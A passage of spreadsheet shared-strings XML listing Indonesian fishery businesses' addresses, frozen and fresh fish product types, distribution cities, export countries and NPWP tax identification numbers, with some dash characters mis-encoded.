    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Jl. Acsess Road, Kel. Lalang, Kec. Medang Deras, Kabupaten Batu Bara&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Sarden, Selar, Aso-aso, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Batu Bara, Kota Tanjung Balai, Kota Medan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Jenaha, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kabupaten Batu Bara, Kota Medan</t>
  </si>
  <si>
    <t>Kabupaten Batu Bara</t>
  </si>
  <si>
    <t>Kawasan PPS Nizam Zachman Blok K 7D (Room 2), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Lemadang, Layaran, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Chile, China, India, Japan, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kawasan PPS Nizam Zachman Blok K 7D (Room 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Kembung, Lemadang, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Sukabumi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Chile, China, Japan, Korea, Democratic People's Republic of, Peru, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Kima 9 Kav L No.7A, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Letjen Gatot Subroto No. 99, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kuring, Salem, Aso-aso, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Sibolga, Kota Padang, Kota Pekanbaru, Kabupaten Muaro Jambi, Kota Palembang, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Malong, Gulama, Kambing-kambing, Biji Nangka, Layur)</t>
  </si>
  <si>
    <t>Kota Sibolga, Kota Padang, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Bogor</t>
  </si>
  <si>
    <t>Jl. Letjen Gator Subroto No.99, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kuring, Salem, Selayang, Aso-aso, Cakalang)</t>
  </si>
  <si>
    <t>Kota Sibolga, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Bogor</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Salem)</t>
  </si>
  <si>
    <t>Desa Taturan, Kec. Gemeh, Kabupaten Kepulauan Talaud&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Palopo</t>
  </si>
  <si>
    <t>Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Kakap, Kaci-kaci, Beloso, Kurisi, Ayam-ayam, Bawal, Swanggi, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Layur)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Gelembung Ikan Beku</t>
  </si>
  <si>
    <t>Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Jl. Soponyono SP 4, Kel. Wonosari Jaya, Kec. Wania, Kabupaten Mimika&lt;br&gt;Papua</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Hitam)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Halibut, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Chile, China, Japan, Korea, Democratic People's Republic of, Oman, Peru, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Muara Baru Ujung Blok K 7D (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Halibut, Beloso, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Australia, Chile, Philippines</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel, Tongkol, Escolar, Kembung, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bekasi, Kota Depok, Kota Tangerang</t>
  </si>
  <si>
    <t>Chile, China, Japan, Korea, Democratic People's Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Utarum Kaki Air Kecil, Kel. Krooy, Kec. Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Kakap, Kaci-kaci, Beloso, Kurisi, Ayam-ayam, Bawal, Swanggi, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Layur)</t>
  </si>
  <si>
    <t>Jl. Sungai Hitam RT 12 No.23, Kel. Pasar Pedati, Kec. Pondok Kelapa, Kabupaten Bengkulu Tengah&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Basreng Ikan</t>
  </si>
  <si>
    <t>Jl. Pariwisata Pasar Bengkulu RT 08, Kel. Pasar Bengkulu, Kec. Sungai Serut, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Jl. Raya Bengko, Kel. Sukamerindu, Kec. Kepahiang, Kabupaten Kepahiang&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Sarden, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Kepahiang</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Sarden, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Bitung, Kota Ternate</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Singapore</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Lencam, Sebelah, Manyung, Kerapu, Layur, Beloso, Bawal, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kabupaten Pasuruan, Kota Denpasar</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Danau Towuti, Kel. Rufei, Kec. Sorong Barat, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Kota Medan, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Dermaga Baru No.9 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Layaran, Muroaji, Deho, Pedang, Lemuru, Lemadang, Marlin, Gindara, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Baronang, Remang, Lencam, Manyung, Kerapu, Layur, Halibut, Sukang, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Indramayu, Kabupaten Karawang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Kerapu Bintik, Kerapu, Kakatua, Kakap Merah, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Bekasi, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Layur, Kembung, Layang, Tenggiri, Tuna Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kota Bitung, Kota Makassar</t>
  </si>
  <si>
    <t>category</t>
  </si>
  <si>
    <t>serial_number</t>
  </si>
  <si>
    <t>npwp</t>
  </si>
  <si>
    <t>76.403.310.6‚Äì402.000</t>
  </si>
  <si>
    <t>01‚Äì001‚Äì887‚Äì7‚Äì451‚Äì001</t>
  </si>
  <si>
    <t>21.010.764.5‚Äì041.000</t>
  </si>
  <si>
    <t>12.345.678.9‚Äì012.345</t>
  </si>
  <si>
    <t>01.061.915.3‚Äì052.000</t>
  </si>
  <si>
    <t>21.035.021.1‚Äì034.000</t>
  </si>
  <si>
    <t>31.292.899.7‚Äì028.000</t>
  </si>
  <si>
    <t>01.833.008.4‚Äì941.001</t>
  </si>
  <si>
    <t>03‚Äì154‚Äì479‚Äì4‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì703‚Äì139‚Äì1‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>nib</t>
  </si>
  <si>
    <t>02.285.960.7‚Äì941.000</t>
  </si>
  <si>
    <t>01.360.591.0‚Äì007.000</t>
  </si>
  <si>
    <t>01.061.076.4‚Äì093.000</t>
  </si>
  <si>
    <t>02‚Äì648‚Äì648‚Äì0‚Äì415‚Äì000</t>
  </si>
  <si>
    <t>72.717.496.3‚Äì732.000</t>
  </si>
  <si>
    <t>02.941.538.7‚Äì731.000</t>
  </si>
  <si>
    <t>01.001.887.7‚Äì046.000</t>
  </si>
  <si>
    <t>14.246.045.0‚Äì732.000</t>
  </si>
  <si>
    <t>01.001.691.3‚Äì057.000</t>
  </si>
  <si>
    <t>01.534.446.8‚Äì732.000</t>
  </si>
  <si>
    <t>76.519.042.6‚Äì731.000</t>
  </si>
  <si>
    <t>02‚Äì776‚Äì585‚Äì8‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>21.092.762.0‚Äì047.000</t>
  </si>
  <si>
    <t>03.183.128.2‚Äì041.000</t>
  </si>
  <si>
    <t>76.533.959.3‚Äì041.000</t>
  </si>
  <si>
    <t>02.746.158.1‚Äì402.000</t>
  </si>
  <si>
    <t>14.163.100.2‚Äì903.000</t>
  </si>
  <si>
    <t>01.071.099.4‚Äì058.000</t>
  </si>
  <si>
    <t>02.612.092.3‚Äì903.000</t>
  </si>
  <si>
    <t>02.797.983.0‚Äì903.000</t>
  </si>
  <si>
    <t>01.960.089.9‚Äì908.000</t>
  </si>
  <si>
    <t>06.775.496.0‚Äì903.000</t>
  </si>
  <si>
    <t>31.818.178.1‚Äì034.000</t>
  </si>
  <si>
    <t>01.871.171.3‚Äì046.000</t>
  </si>
  <si>
    <t>01.960.054.3‚Äì908.000</t>
  </si>
  <si>
    <t>11.122.234.5‚Äì778.909</t>
  </si>
  <si>
    <t>31.691.170.0‚Äì409.000</t>
  </si>
  <si>
    <t>11.111.111.1‚Äì111.111</t>
  </si>
  <si>
    <t>01.873.051.5‚Äì901.000</t>
  </si>
  <si>
    <t>01.777.129.6‚Äì904.000</t>
  </si>
  <si>
    <t>01.440.822.3‚Äì904.000</t>
  </si>
  <si>
    <t>03.040.183.0‚Äì041.000</t>
  </si>
  <si>
    <t>01.984.622.9‚Äì041.000</t>
  </si>
  <si>
    <t>31.428.789.7‚Äì041.000</t>
  </si>
  <si>
    <t>70.068.809.6‚Äì047.000</t>
  </si>
  <si>
    <t>02‚Äì984‚Äì770‚Äì4‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>74.637.678.9‚Äì041.000</t>
  </si>
  <si>
    <t>21.020.861.7‚Äì008.001</t>
  </si>
  <si>
    <t>21.020.870.8‚Äì008.001</t>
  </si>
  <si>
    <t>02.296.549.5‚Äì041.000</t>
  </si>
  <si>
    <t>73.104.229.7‚Äì014.000</t>
  </si>
  <si>
    <t>02.000.591.4‚Äì823.000</t>
  </si>
  <si>
    <t>03.100.277.7‚Äì034.000</t>
  </si>
  <si>
    <t>03‚Äì148‚Äì675‚Äì6‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>74.945.761.0‚Äì041.000</t>
  </si>
  <si>
    <t>88.888.888.8‚Äì888.888</t>
  </si>
  <si>
    <t>74‚Äì175‚Äì865‚Äì0‚Äì306‚Äì000</t>
  </si>
  <si>
    <t>00.000.000.0‚Äì000.000</t>
  </si>
  <si>
    <t>72.158.263.3‚Äì701.000</t>
  </si>
  <si>
    <t>12.345.678.9‚Äì101.112</t>
  </si>
  <si>
    <t>01‚Äì566‚Äì087‚Äì1‚Äì046‚Äì000</t>
  </si>
  <si>
    <t>34.354.545.4‚Äì656.667</t>
  </si>
  <si>
    <t>17.038.155.2‚Äì013.001</t>
  </si>
  <si>
    <t>02‚Äì125‚Äì146‚Äì7‚Äì062‚Äì000</t>
  </si>
  <si>
    <t>01.996.232.3‚Äì041.000</t>
  </si>
  <si>
    <t>01.744.272.4‚Äì046.000</t>
  </si>
  <si>
    <t>02.968.292.9‚Äì034.000</t>
  </si>
  <si>
    <t>02.052.697.6‚Äì413.000</t>
  </si>
  <si>
    <t>01.368.275.2‚Äì092.000</t>
  </si>
  <si>
    <t>02.076.488.2‚Äì057.000</t>
  </si>
  <si>
    <t>02.076.801.6‚Äì046.000</t>
  </si>
  <si>
    <t>02.394.603.1‚Äì822.000</t>
  </si>
  <si>
    <t>01‚Äì506‚Äì383‚Äì7‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>70.815.245.9‚Äì047.000</t>
  </si>
  <si>
    <t>21.058.887.7‚Äì047.000</t>
  </si>
  <si>
    <t>01.413.103.1‚Äì058.000</t>
  </si>
  <si>
    <t>01.775.968.9‚Äì005.000</t>
  </si>
  <si>
    <t>02.380.501.3‚Äì732.001</t>
  </si>
  <si>
    <t>71.191.856.5‚Äì047.000</t>
  </si>
  <si>
    <t>02.036.274.5‚Äì511.000</t>
  </si>
  <si>
    <t>02.192.829.6‚Äì503.000</t>
  </si>
  <si>
    <t>31.703.794.3‚Äì506.000</t>
  </si>
  <si>
    <t>31.270.905.8‚Äì432.000</t>
  </si>
  <si>
    <t>01.837.346.4‚Äì047.000</t>
  </si>
  <si>
    <t>01.356.724.3‚Äì062.000</t>
  </si>
  <si>
    <t>31.618.761.6‚Äì047.000</t>
  </si>
  <si>
    <t>76.418.821.5‚Äì704.000</t>
  </si>
  <si>
    <t>70.710.562.3‚Äì941.000</t>
  </si>
  <si>
    <t>07.738.204.2‚Äì941.000</t>
  </si>
  <si>
    <t>03.193.392.2‚Äì072.000</t>
  </si>
  <si>
    <t>02.571.619.2‚Äì941.000</t>
  </si>
  <si>
    <t>02‚Äì831‚Äì002‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>01.300.156.5‚Äì047.000</t>
  </si>
  <si>
    <t>01‚Äì696‚Äì446‚Äì2‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>812-000-3851916</t>
  </si>
  <si>
    <t>02‚Äì812‚Äì141‚Äì6‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>03.274.779.2‚Äì941.000</t>
  </si>
  <si>
    <t>01.510.676.8‚Äì811.001</t>
  </si>
  <si>
    <t>01.892.104.9‚Äì041.000</t>
  </si>
  <si>
    <t>31.467.219.7‚Äì041.000</t>
  </si>
  <si>
    <t>02.831.116.5‚Äì041.000</t>
  </si>
  <si>
    <t>76.158.009.1‚Äì047.000</t>
  </si>
  <si>
    <t>02.747.401.4‚Äì047.000</t>
  </si>
  <si>
    <t>03.107.192.1‚Äì811.000</t>
  </si>
  <si>
    <t>76‚Äì322‚Äì116‚Äì5‚Äì085‚Äì001</t>
  </si>
  <si>
    <t>01.475.015.2‚Äì904.000</t>
  </si>
  <si>
    <t>01.870.966.7‚Äì033.000</t>
  </si>
  <si>
    <t>02‚Äì296‚Äì220‚Äì3‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>81.208.565.2‚Äì041.000</t>
  </si>
  <si>
    <t>01‚Äì144‚Äì273‚Äì8‚Äì517‚Äì000</t>
  </si>
  <si>
    <t>01.703.601.3‚Äì431.000</t>
  </si>
  <si>
    <t>80.770.172.7‚Äì732.000</t>
  </si>
  <si>
    <t>66.604.362.5‚Äì941.000</t>
  </si>
  <si>
    <t>03.160.560.3‚Äì047.000</t>
  </si>
  <si>
    <t>03.281.089.7‚Äì041.000</t>
  </si>
  <si>
    <t>02.380.501.3‚Äì436.000</t>
  </si>
  <si>
    <t>02.039.113.2‚Äì046.000</t>
  </si>
  <si>
    <t>71.033.355.0‚Äì702.000</t>
  </si>
  <si>
    <t>01‚Äì002‚Äì749‚Äì8‚Äì054‚Äì000</t>
  </si>
  <si>
    <t>31.547.678.8‚Äì402.000</t>
  </si>
  <si>
    <t>03.040.483.4‚Äì041.000</t>
  </si>
  <si>
    <t>02.830.960.7‚Äì041.000</t>
  </si>
  <si>
    <t>02‚Äì623‚Äì589‚Äì5‚Äì042‚Äì000</t>
  </si>
  <si>
    <t>01.517.118.4‚Äì401.001</t>
  </si>
  <si>
    <t>02.487.828.2‚Äì811.000</t>
  </si>
  <si>
    <t>80.905.711.0‚Äì704.000</t>
  </si>
  <si>
    <t>01.882.922.6‚Äì057.000</t>
  </si>
  <si>
    <t>76.398.849.0‚Äì941.000</t>
  </si>
  <si>
    <t>01.941.600.7‚Äì614.000</t>
  </si>
  <si>
    <t>01.807.688.5‚Äì031.000</t>
  </si>
  <si>
    <t>02.293.607.4‚Äì041.000</t>
  </si>
  <si>
    <t>01.891.866.4‚Äì041.000</t>
  </si>
  <si>
    <t>80.639.139.7‚Äì019.000</t>
  </si>
  <si>
    <t>01.071.198.4‚Äì057.000</t>
  </si>
  <si>
    <t>80.161.230.0‚Äì041.000</t>
  </si>
  <si>
    <t>81.544.238.9‚Äì041.000</t>
  </si>
  <si>
    <t xml:space="preserve">bukti Pajak </t>
  </si>
  <si>
    <t>01.772.284.4‚Äì038.000</t>
  </si>
  <si>
    <t>09.789.070.1‚Äì732.000</t>
  </si>
  <si>
    <t>02.092.800.8‚Äì305.000</t>
  </si>
  <si>
    <t>01.343.593.8‚Äì046.000</t>
  </si>
  <si>
    <t>03‚Äì125‚Äì050‚Äì9‚Äì044‚Äì000</t>
  </si>
  <si>
    <t>02.823.927.5‚Äì047.000</t>
  </si>
  <si>
    <t>81.517.320.8‚Äì811.000</t>
  </si>
  <si>
    <t>81.052.367.0‚Äì041.000</t>
  </si>
  <si>
    <t>21.040.377.0‚Äì407.000</t>
  </si>
  <si>
    <t>31.434.872.3‚Äì507.001</t>
  </si>
  <si>
    <t>02.115.861.3‚Äì513.000</t>
  </si>
  <si>
    <t>71.457.674.1‚Äì434.000</t>
  </si>
  <si>
    <t>02‚Äì830‚Äì960‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>02.092.813.1‚Äì305.000</t>
  </si>
  <si>
    <t>02.380.501.3‚Äì701.001</t>
  </si>
  <si>
    <t>01.300.602.8‚Äì056.000</t>
  </si>
  <si>
    <t>02.470.669.9-436.000</t>
  </si>
  <si>
    <t>01.627.995.2‚Äì304.000</t>
  </si>
  <si>
    <t>01‚Äì923‚Äì651‚Äì2‚Äì041‚Äì001</t>
  </si>
  <si>
    <t>31‚Äì607‚Äì285‚Äì9‚Äì036‚Äì000</t>
  </si>
  <si>
    <t>02.830.829.4‚Äì041.000</t>
  </si>
  <si>
    <t>01.001.661.6‚Äì051.000</t>
  </si>
  <si>
    <t>31.233.933.0‚Äì043.000</t>
  </si>
  <si>
    <t>02.830.737.9‚Äì041.000</t>
  </si>
  <si>
    <t>02.379.509.9‚Äì041.000</t>
  </si>
  <si>
    <t>01‚Äì341‚Äì636‚Äì7‚Äì062‚Äì000</t>
  </si>
  <si>
    <t>02.830.844.3‚Äì041.000</t>
  </si>
  <si>
    <t>01.001.701.0‚Äì092.000</t>
  </si>
  <si>
    <t>03.233.102.7‚Äì815.000</t>
  </si>
  <si>
    <t>01.002.148.3‚Äì054.000</t>
  </si>
  <si>
    <t>02.461.328.3‚Äì047.000</t>
  </si>
  <si>
    <t>81.281.146.1‚Äì041.000</t>
  </si>
  <si>
    <t>21‚Äì038‚Äì082‚Äì0‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>73.588.626.9-085.000</t>
  </si>
  <si>
    <t>31.428.280.7‚Äì418.000</t>
  </si>
  <si>
    <t>02‚Äì189‚Äì571‚Äì9‚Äì037‚Äì000</t>
  </si>
  <si>
    <t>31.529.200.3-403.000</t>
  </si>
  <si>
    <t>02.115.638.5‚Äì059.000</t>
  </si>
  <si>
    <t>02.812.141.6‚Äì941.000</t>
  </si>
  <si>
    <t>32.338.104.2‚Äì502.000</t>
  </si>
  <si>
    <t>01.309.570.8‚Äì015.000</t>
  </si>
  <si>
    <t>01.071.134.9‚Äì941.000</t>
  </si>
  <si>
    <t>03.125.050.9‚Äì044.000</t>
  </si>
  <si>
    <t>73.605.634.2‚Äì047.000</t>
  </si>
  <si>
    <t>75.652.491.4‚Äì507.000</t>
  </si>
  <si>
    <t>72‚Äì018‚Äì560‚Äì2‚Äì413‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì870‚Äì966‚Äì7‚Äì941‚Äì001</t>
  </si>
  <si>
    <t>75.554.941.7‚Äì816.000</t>
  </si>
  <si>
    <t>01.567.935.0‚Äì631.000</t>
  </si>
  <si>
    <t>03.211.945.5‚Äì085.000</t>
  </si>
  <si>
    <t>01.100.476.9‚Äì041.001</t>
  </si>
  <si>
    <t>01.342.405.6‚Äì627.000</t>
  </si>
  <si>
    <t>01.891.752.6‚Äì046.000</t>
  </si>
  <si>
    <t>01.083.032.1‚Äì631.000</t>
  </si>
  <si>
    <t>02.792.376.2‚Äì044.000</t>
  </si>
  <si>
    <t>01.776.232.9‚Äì038.000</t>
  </si>
  <si>
    <t>76.552.521.7‚Äì941.000</t>
  </si>
  <si>
    <t>66.029.449.7‚Äì426.000</t>
  </si>
  <si>
    <t>01.233.310.0‚Äì641.000</t>
  </si>
  <si>
    <t>01‚Äì465‚Äì954‚Äì4‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>01.342.346.2‚Äì627.000</t>
  </si>
  <si>
    <t>01.458.735.6‚Äì641.000</t>
  </si>
  <si>
    <t>01.517.118.4‚Äì648.001</t>
  </si>
  <si>
    <t>01.137.423.8‚Äì651.000</t>
  </si>
  <si>
    <t>03.206.389.3‚Äì609.000</t>
  </si>
  <si>
    <t>01.913.211.7‚Äì625.000</t>
  </si>
  <si>
    <t>02.208.003.0‚Äì615.000</t>
  </si>
  <si>
    <t>02.026.181.4‚Äì641.000</t>
  </si>
  <si>
    <t>01‚Äì148‚Äì487‚Äì0‚Äì054‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì800‚Äì251‚Äì7‚Äì645‚Äì000</t>
  </si>
  <si>
    <t>01.821.663.0‚Äì651.000</t>
  </si>
  <si>
    <t>02.384.452.5‚Äì651.000</t>
  </si>
  <si>
    <t>02.268.035.9‚Äì723.000</t>
  </si>
  <si>
    <t>02.067.758.9‚Äì615.001</t>
  </si>
  <si>
    <t>31.470.640.9‚Äì627.000</t>
  </si>
  <si>
    <t>01.517.118.4‚Äì612.002</t>
  </si>
  <si>
    <t>01.643.415.1‚Äì643.001</t>
  </si>
  <si>
    <t>01‚Äì829‚Äì654‚Äì1‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>01.517.118.4‚Äì641.000</t>
  </si>
  <si>
    <t>01‚Äì517‚Äì118‚Äì4‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>01.830.004.6‚Äì651.000</t>
  </si>
  <si>
    <t>66.176.187.4‚Äì012.000</t>
  </si>
  <si>
    <t>01.313.605.6‚Äì037.000</t>
  </si>
  <si>
    <t>03.006.175.8‚Äì215.000</t>
  </si>
  <si>
    <t>01.643.415.7‚Äì622.000</t>
  </si>
  <si>
    <t>04.218.418.4‚Äì622.000</t>
  </si>
  <si>
    <t>02.876.339.9‚Äì617.000</t>
  </si>
  <si>
    <t>01.707.736.3‚Äì651.000</t>
  </si>
  <si>
    <t>02.391.429.4‚Äì617.000</t>
  </si>
  <si>
    <t>01.468.067.2‚Äì651.000</t>
  </si>
  <si>
    <t>02.316.412.1‚Äì511.212</t>
  </si>
  <si>
    <t>71.309.342.5‚Äì041.000</t>
  </si>
  <si>
    <t>21.127.466.7‚Äì432.000</t>
  </si>
  <si>
    <t>31‚Äì379‚Äì592‚Äì4‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>76.897.976.7‚Äì004.000</t>
  </si>
  <si>
    <t>66.425.026.3‚Äì041.000</t>
  </si>
  <si>
    <t>02.192.865.0‚Äì057.000</t>
  </si>
  <si>
    <t>58‚Äì128‚Äì609‚Äì3‚Äì085‚Äì000</t>
  </si>
  <si>
    <t>72.158.394.6‚Äì041.000</t>
  </si>
  <si>
    <t>01.069.501.3‚Äì057.000</t>
  </si>
  <si>
    <t>01.454.019.9‚Äì631.000</t>
  </si>
  <si>
    <t>01.886.481.9‚Äì057.000</t>
  </si>
  <si>
    <t>75.212.395.0‚Äì047.001</t>
  </si>
  <si>
    <t>01.083.287.1‚Äì651.000</t>
  </si>
  <si>
    <t>76.487.979.7‚Äì101.000</t>
  </si>
  <si>
    <t>02‚Äì728‚Äì709‚Äì4‚Äì431‚Äì000</t>
  </si>
  <si>
    <t>31.328.567.8‚Äì617.000</t>
  </si>
  <si>
    <t>02.116.078.3‚Äì057.000</t>
  </si>
  <si>
    <t>72.132.706.2‚Äì513.000</t>
  </si>
  <si>
    <t>71.323.777.4‚Äì507.000</t>
  </si>
  <si>
    <t>71.028.111.4‚Äì501.000</t>
  </si>
  <si>
    <t>80.989.346.4‚Äì447.000</t>
  </si>
  <si>
    <t>01.356.452.1‚Äì058.000</t>
  </si>
  <si>
    <t>02.713.846.0‚Äì641.000</t>
  </si>
  <si>
    <t>72.579.838.3‚Äì518.000</t>
  </si>
  <si>
    <t>80.634.541.9‚Äì723.000</t>
  </si>
  <si>
    <t>02.988.541.5‚Äì086.000</t>
  </si>
  <si>
    <t>01.961.201.9‚Äì522.000</t>
  </si>
  <si>
    <t>80.535.588.0‚Äì041.000</t>
  </si>
  <si>
    <t>01.952.405.7‚Äì007.000</t>
  </si>
  <si>
    <t>72.616770.3-041.000</t>
  </si>
  <si>
    <t>01.517.118.4‚Äì811.001</t>
  </si>
  <si>
    <t>71.178.017.1‚Äì822.000</t>
  </si>
  <si>
    <t>76‚Äì095‚Äì545‚Äì0‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì418‚Äì537‚Äì8‚Äì022‚Äì000</t>
  </si>
  <si>
    <t>01.961.201.9‚Äì811.001</t>
  </si>
  <si>
    <t>82.591.197.7‚Äì041.000</t>
  </si>
  <si>
    <t>74.719.423.1‚Äì507.000</t>
  </si>
  <si>
    <t>02.747.876.7‚Äì048.000</t>
  </si>
  <si>
    <t>31‚Äì654‚Äì028‚Äì5‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>73.020.214.0‚Äì043.000</t>
  </si>
  <si>
    <t>36.347.884.3‚Äì702.000</t>
  </si>
  <si>
    <t>03.280.957.6‚Äì041.000</t>
  </si>
  <si>
    <t>66.431.024.0‚Äì041.000</t>
  </si>
  <si>
    <t>06.656.767.8‚Äì701.000</t>
  </si>
  <si>
    <t>01.810.726.8‚Äì816.000</t>
  </si>
  <si>
    <t>01.896.243.1‚Äì503.000</t>
  </si>
  <si>
    <t>31.558.137.1‚Äì034.000</t>
  </si>
  <si>
    <t>73‚Äì514‚Äì610‚Äì2‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>80.462.490.6‚Äì451.000</t>
  </si>
  <si>
    <t>31.182.774.5‚Äì411.000</t>
  </si>
  <si>
    <t>72.468.251.3‚Äì047.000</t>
  </si>
  <si>
    <t>02.831.034.0‚Äì041.000</t>
  </si>
  <si>
    <t>01.070.905.3‚Äì903.001</t>
  </si>
  <si>
    <t>01.728.204.7‚Äì903.000</t>
  </si>
  <si>
    <t>01.885.663.3‚Äì904.000</t>
  </si>
  <si>
    <t>02.755.052.4‚Äì541.000</t>
  </si>
  <si>
    <t>01.680.911.3‚Äì041.000</t>
  </si>
  <si>
